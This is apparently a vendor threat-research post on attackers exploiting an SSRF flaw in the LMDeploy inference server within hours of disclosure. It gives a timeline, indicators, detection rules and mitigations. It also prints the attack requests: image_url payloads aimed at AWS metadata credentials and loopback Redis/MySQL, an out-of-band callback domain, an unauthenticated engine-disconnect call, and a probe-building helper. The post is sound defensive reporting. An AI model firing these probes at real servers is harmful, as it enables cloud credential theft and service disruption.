
CVE-2026-33626: How attackers exploited LMDeploy LLM Inference Engines in 12 hours

Published by: Sysdig Threat Research Team
Published: April 22, 2026

On April 21, 2026, GitHub published GHSA-6w67-hwm5-92mq, later assigned CVE-2026-33626, a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy, a toolkit for serving vision-language and text large language models (LLMs) developed by the InternLM team at Shanghai AI Laboratory.

Within 12 hours and 31 minutes of its publication on the main GitHub advisory page, the Sysdig Threat Research Team (TRT) observed the first LMDeploy exploitation attempt against our honeypot fleet. The attacker did not simply validate the bug and move on. Over a single eight-minute session, they used the vision-language image loader as a generic HTTP SSRF primitive to probe the internal network behind the model server: the AWS Instance Metadata Service (IMDS), Redis, MySQL, and a secondary HTTP administrative interface. They also confirmed egress with an out-of-band (OOB) DNS callback.

The Sysdig TRT deployed a honeypot running a vulnerable LMDeploy instance shortly after the advisory went live. The malicious activity that followed shows how an attacker weaponizes a narrowly described SSRF against an AI-infrastructure tool such as LMDeploy.

Exploitation timeline

Time (UTC)       | Event
April 18, 15:09  | Repository-level GitHub Security Advisory (GHSA) published*
April 20, 21:16  | CVE-2026-33626 created in NVD
April 21, 15:04  | GHSA-6w67-hwm5-92mq published on GitHub
April 22, 03:35  | First exploitation attempt observed (from 103.116.72.119)

The gap between the indexed GHSA publication and the first exploitation was 12 hours and 31 minutes. No public proof-of-concept (PoC) code existed on GitHub or any major exploit repository at the time of the attack. As with several recent niche-target cases, the advisory text itself contained enough detail to construct a working exploit from scratch, including the affected file, parameter name, and the absence of scheme or host validation.

*NOTE: There is no straightforward way to search for repository-level GHSAs — they require monitoring specific repositories — so the Sysdig TRT does not include repository-level GHSA publication in our advisory-to-exploit 12-hour timeline. Instead, our clock begins when the advisory was published on the main GitHub advisory page.

The LMDeploy vulnerability

LMDeploy is a production inference toolkit that serves vision-language models (VLMs), such as InternVL2, internlm-xcomposer2, and Qwen2-VL, through an OpenAI-compatible HTTP API. When a chat completion request contains an image_url field, the server dereferences that URL and loads the image into the model's context. 

Below is the standard OpenAI vision-message shape:

{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user",
    "content": [
      {"type": "text", "text": "describe this"},
      {"type": "image_url", "image_url": {"url": "http://..."}}
    ]
  }]
}

The server-side loader that dereferences this URL performed no hostname resolution check, applied no private-network blocklist, and had no protection for link-local addresses. Any URL with an http:// or https:// scheme, including http://169.254.169.254/, http://127.0.0.1:3306, or any RFC 1918 address, was fetched by the server and returned to the model; in the case of a binary protocol like Redis or MySQL, the server returned enough of an error response to confirm the port was open.
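For comparison, a hostname-resolution check of the kind the loader was missing can be sketched in a few lines of Python. This is a hypothetical illustration of the technique, not LMDeploy's actual _is_safe_url() implementation:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_image_url(url: str) -> bool:
    """Reject URLs whose scheme is not HTTP(S), or whose host resolves to a
    loopback, link-local, private (RFC 1918), or reserved address."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        # Resolve every A/AAAA record; an attacker controls DNS for their host.
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_loopback or ip.is_link_local or ip.is_private or ip.is_reserved:
            return False
    return True
```

Note that a production-grade check must also pin the resolved IP for the actual fetch; validating first and re-resolving later leaves a DNS-rebinding window between the check and the request.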

The three phases of LMDeploy exploitation

Over the eight-minute session, 103.116.72.119 produced 10 distinct requests across three phases, alternating between two vision-language models, internlm-xcomposer2 and OpenGVLab/InternVL2-8B. Switching models mid-session suggests the operator knew that some VLMs refuse suspicious inputs and was testing both.

Phase 1: Cloud-metadata and Redis (03:35:22 to 03:37:45 UTC)

The attacker's first request targeted AWS IMDS directly:

POST /v1/chat/completions
model: internlm-xcomposer2
image_url: http://169.254.169.254/latest/meta-data/iam/security-credentials/

Two minutes later the attacker pivoted to the loopback Redis port:

image_url: http://127.0.0.1:6379

The choice of port 6379 is significant: It is the standard Redis port and a well-known post-IMDS target in SSRF chains. This SSRF primitive does not support arbitrary body content, but a successful connection on 6379 would confirm that Redis is present on the internal interface.
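Every request in this phase shares one shape: a minimal chat-completion body whose only purpose is to make the server fetch an attacker-chosen URL. A defender reproducing the traffic against a test instance they own could build the payload like this (a sketch following the request shape shown above; the default model name is the one the attacker used first):

```python
import json

def build_ssrf_probe(target_url: str, model: str = "internlm-xcomposer2") -> dict:
    """Build an OpenAI-style chat-completion body whose image_url points at
    an internal target instead of an image, mirroring the observed traffic."""
    return {
        "model": model,
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "describe this"},
                {"type": "image_url", "image_url": {"url": target_url}},
            ],
        }],
    }

# POST this body to /v1/chat/completions on a test instance you own.
body = build_ssrf_probe("http://127.0.0.1:6379")
print(json.dumps(body, indent=2))
```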

Phase 2: OOB callback and API enumeration (03:41:07 to 03:41:58 UTC)

Three minutes later the attacker tested egress with an out-of-band (OOB) DNS callback to requestrepo.com, a public OAST (out-of-band application security testing) service similar to Burp Collaborator and Project Discovery's interact.sh:

image_url: http[://]cw2mhnbd.requestrepo.com

On a vulnerable real-world LMDeploy instance with unrestricted egress, the attacker's requestrepo.com dashboard would receive an HTTP callback confirming both the SSRF and that the server can reach arbitrary external hosts. This is a standard blind-SSRF confirmation step.
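Defenders can hunt for this confirmation step retroactively: outbound DNS or HTTP requests from inference nodes to known OAST provider domains are almost never legitimate. A simple log filter might look like the following sketch (the provider list is illustrative, not exhaustive; extend it for your environment):

```python
import re

# Domains used by common OAST services (requestrepo.com was seen here;
# oastify.com is Burp Collaborator, oast.fun is a ProjectDiscovery domain).
OAST_DOMAINS = ("requestrepo.com", "oastify.com", "oast.fun")

OAST_PATTERN = re.compile(
    r"\b([a-z0-9]+)\.(" + "|".join(re.escape(d) for d in OAST_DOMAINS) + r")\b",
    re.IGNORECASE,
)

def find_oast_callbacks(log_lines):
    """Yield (subdomain_token, provider) pairs for every OAST hit in the logs.
    The token identifies the operator's session on the OAST service."""
    for line in log_lines:
        m = OAST_PATTERN.search(line)
        if m:
            yield m.group(1), m.group(2)

hits = list(find_oast_callbacks([
    "03:41:07 GET http://cw2mhnbd.requestrepo.com/ 200",
    "03:41:09 GET http://mirror.example.com/ 200",
]))
```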

Immediately after the OOB test, the attacker enumerated the API surface:

GET /
GET /openapi.json
POST /v1/chat/completions  (model: OpenGVLab/InternVL2-8B, no image_url)

The /openapi.json request is typical of an attacker reading the server's auto-generated OpenAPI schema to find additional endpoints beyond /v1/chat/completions. LMDeploy exposes several administrative endpoints under /distserve/* for its serving mode, which were almost certainly discovered here.
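Reading the schema the way the attacker likely did takes only a few lines: given a fetched openapi.json document, flattening the paths object is enough to surface the /distserve/* admin surface. The sample schema below is a hypothetical fragment for illustration, not LMDeploy's actual schema:

```python
def list_endpoints(openapi_doc: dict):
    """Flatten an OpenAPI schema's paths object into (METHOD, path) pairs."""
    for path, operations in openapi_doc.get("paths", {}).items():
        for method in operations:
            yield method.upper(), path

# Hypothetical fragment of what GET /openapi.json might return.
schema = {
    "paths": {
        "/v1/chat/completions": {"post": {}},
        "/distserve/p2p_drop_connect": {"post": {}},
    }
}
endpoints = sorted(list_endpoints(schema))
```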

Phase 3: Admin-plane probe and localhost port sweep (03:42:35 to 03:43:53 UTC)

The attacker first probed the distributed-serving kill-switch:

POST /distserve/p2p_drop_connect
body: {}

The endpoint above tears down the ZMQ link to a named remote engine in a disaggregated LMDeploy cluster. The affected code calls self.zmq_disconnect(drop_conn_request.remote_engine_id) and returns {'success': True}. An attacker who knows or guesses a live remote_engine_id can disrupt the prefill/decode route for that peer, degrading or breaking inference flowing through it. In the affected versions, these endpoints had no authentication layer in the default configuration.

The attacker then returned to the SSRF primitive and systematically port-scanned the loopback interface over 36 seconds:

Time     | Target URL            | Likely service
03:43:17 | http://127.0.0.1:8080 | Secondary HTTP / proxy admin
03:43:36 | http://127.0.0.1:3306 | MySQL
03:43:53 | http://127.0.0.1      | HTTP (port 80)

Three localhost probes in 36 seconds is the signature of a scripted port sweep using the SSRF as a probe primitive. The attacker is not looking for image files; they are instead treating the vision-LLM endpoint as a generic HTTP GET that can reach addresses the external network cannot. Every one of these URLs is blocked by the v0.12.3 _is_safe_url() check.

What this means for defenders

CVE-2026-33626 fits a pattern that we have observed repeatedly in the AI-infrastructure space over the past six months: critical vulnerabilities in inference servers, model gateways, and agent orchestration tools are being weaponized within hours of advisory publication, regardless of the size of their install base. LMDeploy, for instance, has 7,798 GitHub stars, an order of magnitude fewer than mainstream projects like vLLM or Ollama, and it does not appear in CISA's Known Exploited Vulnerabilities (KEV) catalog.

The observed timeline extends the trend reported in the Zero Day Clock project and our own prior research on marimo's pre-auth RCE. Attackers are no longer waiting for mass-exploitation tools. The advisory text, read carefully, is enough to craft an exploit.

Generative AI (GenAI) is accelerating this collapse. An advisory as specific as GHSA-6w67-hwm5-92mq, which includes the affected file, parameter name, root-cause explanation, and sample vulnerable code, is effectively an input prompt for any commercial LLM to generate a potential exploit. We have observed and reported on this pattern across multiple recent niche-target exploitations: a GHSA publishes, a working exploit appears within hours, and no public PoC ever existed.

In the age of capable code-generation models, any advisory that names the vulnerable function, shows the missing check, or quotes the affected code pattern becomes a turnkey exploit recipe. The irony that CVE-2026-33626's target is itself an LLM-serving framework is incidental; the same acceleration applies across the CVE landscape.

What distinguishes CVE-2026-33626 from a textbook SSRF is what the primitive unlocks on an AI-serving node:

  • IAM credentials and cloud metadata. Vision-LLM nodes typically run on GPU instances with broad IAM roles: S3 model artifacts, training datasets, and often cross-account assume-role. One successful IMDS fetch can compromise the cloud account.
  • In-cluster data stores. Inference deployments typically ship with Redis for prompt caching, MySQL or Postgres for metering, and internal HTTP control planes. The attacker's probes (127.0.0.1:6379, 127.0.0.1:3306, and 127.0.0.1:8080) map directly onto this topology.
  • Model-level denial of service. The distserve/p2p_drop_connect probe shows that the attacker understood LMDeploy's disaggregated-serving architecture: Tearing down the ZMQ link between prefill and decode engines disrupts inference on that route.
  • Generic HTTP primitive. Unlike remote code execution (RCE), this SSRF is a read-only HTTP client inside the victim's network, reachable from the public internet. For reconnaissance before a larger operation, this access is often a more valuable foothold than many code-execution bugs.

Combined with the lax IP-level egress controls common in GPU-hosted environments, this class of bug is particularly attractive to attackers.

Indicators of Compromise

Source IPs

IP             | Location        | ASN
103.116.72.119 | Kowloon Bay, HK | AS400618 Prime Security Corp.

The source IP may be a proxy, VPN endpoint, or cloud instance rented for the operation rather than the operator's true origin.

Callback infrastructure

Domain                   | Purpose
cw2mhnbd.requestrepo.com | Out-of-band DNS/HTTP exfil subdomain provided by the requestrepo.com OAST service. The cw2mhnbd prefix is unique to this operator's session.

Target URLs fetched by the SSRF

URL                                                               | Classification
http://169.254.169.254/latest/meta-data/iam/security-credentials/ | AWS IMDSv1: IAM role credential exfiltration
http://127.0.0.1:6379                                             | Loopback Redis
http://127.0.0.1:3306                                             | Loopback MySQL
http://127.0.0.1:8080                                             | Loopback secondary HTTP
http://127.0.0.1                                                  | Loopback HTTP (port 80)
http[://]cw2mhnbd.requestrepo.com                                 | Blind-SSRF OOB confirmation

Runtime detection

Runtime detection for this attack class sits in two layers: the application layer and the host layer. 

At the application layer, any inference server that fetches URLs from user-supplied content should log the resolved IP of every outbound request and alert on requests to link-local (169.254.0.0/16), loopback (127.0.0.0/8, ::1), or RFC 1918 private ranges, as well as well-known service ports on those ranges (6379 Redis, 3306 MySQL, 5432 Postgres, 9200 Elasticsearch, 2375/2376 Docker). At the host layer, runtime detection captures the post-exploitation symptom (an outbound connection to a cloud metadata endpoint from an inference process) regardless of framework. 
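The application-layer rule above reduces to a small predicate over the resolved destination. A sketch follows; the port list mirrors the services named in this post, and both lists should be tuned for your environment:

```python
import ipaddress

# Internal service ports worth calling out by name in the alert.
SENSITIVE_PORTS = {6379: "Redis", 3306: "MySQL", 5432: "Postgres",
                   9200: "Elasticsearch", 2375: "Docker", 2376: "Docker TLS"}

def outbound_alert(resolved_ip: str, port: int):
    """Return an alert label if an inference server's outbound fetch targets
    an internal range, or None if the destination looks benign."""
    ip = ipaddress.ip_address(resolved_ip)
    if ip.is_link_local:          # 169.254.0.0/16 — cloud metadata endpoints
        label = "link-local (cloud metadata endpoint?)"
    elif ip.is_loopback:          # 127.0.0.0/8, ::1
        label = "loopback"
    elif ip.is_private:           # RFC 1918 / ULA
        label = "RFC 1918 / private"
    else:
        return None
    service = SENSITIVE_PORTS.get(port)
    return f"{label} -> {service}" if service else label
```

The same predicate covers the ECS/Fargate metadata endpoint (169.254.170.2), since it sits inside the link-local range.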

Sysdig Secure ships several out-of-the-box Falco rules that fire on exactly the URLs the attacker attempted. Teams running Sysdig Secure on GPU and inference nodes should enable these detection rules for vision-language and agent tool-use workloads:

•   Contact EC2 Instance Metadata Service From Container
•   Contact EC2 Instance Metadata Service From Host
•   Contact GCP Instance Metadata Service From Container
•   Contact GCP Instance Metadata Service From Host
•   Contact Azure Instance Metadata Service From Container
•   Contact Azure Instance Metadata Service From Host
•   Contact Task Metadata Endpoint

On a vulnerable real-world LMDeploy instance, the attacker's first request would trigger the rule Contact EC2 Instance Metadata Service From Container the moment the server-side requests.get() reached IMDS, independent of any application-layer logging.

The GCP and Azure rules fire the same way for victims running on those clouds, and Contact Task Metadata Endpoint covers ECS/Fargate workloads where IMDS lives at 169.254.170.2, rather than 169.254.169.254.

Recommendations

  • Assume breach for any LMDeploy deployment that was internet-reachable while running an affected version.
  • Update LMDeploy to v0.12.3 or later. If upgrading is not possible, front the inference API with a reverse proxy that strips or rewrites image_url values, or disable vision-model endpoints entirely.
  • Enforce IMDSv2 on inference nodes. Set httpTokens=required to disable IMDSv1. This is the single highest-ROI control for this class of bug: a requests.get() SSRF primitive cannot acquire the required session token (no way to issue a PUT /latest/api/token first). Pair with httpPutResponseHopLimit=1 to prevent containers reaching IMDS via the default bridge network.
  • Restrict outbound egress from inference servers at the VPC/SG level. Inference nodes should only reach model-artifact storage (S3, GCS) and logging endpoints.
  • Rotate any IAM role credentials attached to publicly reachable LMDeploy deployments version 0.12.2 or earlier. 
  • Audit internal service exposure on inference nodes. Redis, MySQL, and admin control planes should bind to a private interface only when genuinely required by the model server, and must require authentication regardless.
  • Monitor outbound connections from inference processes to link-local, RFC 1918, or loopback addresses. These should be zero in normal operation.
  • Inventory AI-infrastructure tooling. Model-serving platforms (LMDeploy, vLLM, TGI, Ray Serve) are frequently deployed outside standard security review and often not covered by CVE scanning until well after disclosure.

Conclusion

CVE-2026-33626 fits a consistent pattern: inference and agent-framework SSRF bugs weaponized within hours of GHSA publication by operators who build from the advisory rather than wait for a public PoC. Twelve hours and 31 minutes from publication to the first observed exploitation of LMDeploy is short enough that “patch Tuesday” cadences and monthly scans are not a sufficient control. The attacker did not merely validate the bug; they used it as a port-scanning primitive in a single eight-minute session.

For defenders running AI infrastructure, vision-LLM image loaders, agent tool-use endpoints, and RAG fetchers are all SSRF candidates by default unless explicit egress filtering is applied. Runtime detection on the inference host, strict VPC egress controls, and rapid-patch response remain the most effective controls when the weaponization window is measured in hours.
